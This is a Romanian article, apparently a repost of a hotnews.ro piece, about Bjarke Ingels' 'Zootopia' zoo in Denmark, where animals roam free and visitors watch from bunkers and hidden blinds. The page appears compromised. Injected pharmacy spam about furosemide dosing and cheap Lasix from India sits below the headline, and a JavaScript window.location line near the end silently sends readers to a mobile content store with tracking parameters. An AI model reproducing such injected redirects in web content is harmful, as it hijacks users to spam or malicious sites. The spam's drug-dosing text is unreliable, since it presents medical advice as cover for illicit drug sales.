Danemarca: Gradina Zoologica fara custi va pune oamenii in captivitate

 

Take furosemide exactly as directed by your doctor. To reduce nighttime urination, take furosemide early in the day unless otherwise cheap Lasix from india proiect-zootopia1

Arhitectul danez Bjarke Ingels reinventeaza conceptul de gradina zoologica, punand oamenii in captivitate. Planul sau pentru “Zootopia”, o gradina zoologica construita in 1960 in sudul Danemarcei, este o lume in care animalele se plimba libere, in timp ce vizitatorii le observa din locuri ascunse, sub pamant sau din interiorul gramezilor de busteni, scrie The Guardian.
“Sarcina cea mai minunata si mai importanta a unui arhitect este de a se asigura ca orasele ofera un cadru potrivit pentru oameni diferiti- din medii diferite, economii diferite, gen diferit, cultura, educatie si varsta diferita-astfel incat pot trai impreuna in armonie”, scrie Bjarke Ingels Group.

Din punctul asta de vedere, “nicaieri nu este o provocare mai puternica decat intr-o gradina zoologica”.

Vizitatorii vor putea observa leii dintr-un buncar ingropat sub un deal si vor putea privi ursii panda prin intermediul unui ecran de bambus. Oamenii se vor uita la ursi dintr-o casuta ascunsa in trunchiuri de copac si vor observa girafele prin intermediul unor gauri taiate intr-un deal.

“In loc sa copiem arhitectura de pe diferite continente prin arhitectura vernaculara (<arhitectura populara> sau <arhitectura fara arhitecti>- n,red.), ne-am propus sa integram si sa ascundem cat putem de mult cladirile in peisaj”, spun arhitectii.

Sursa: www.hotnews.ro

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *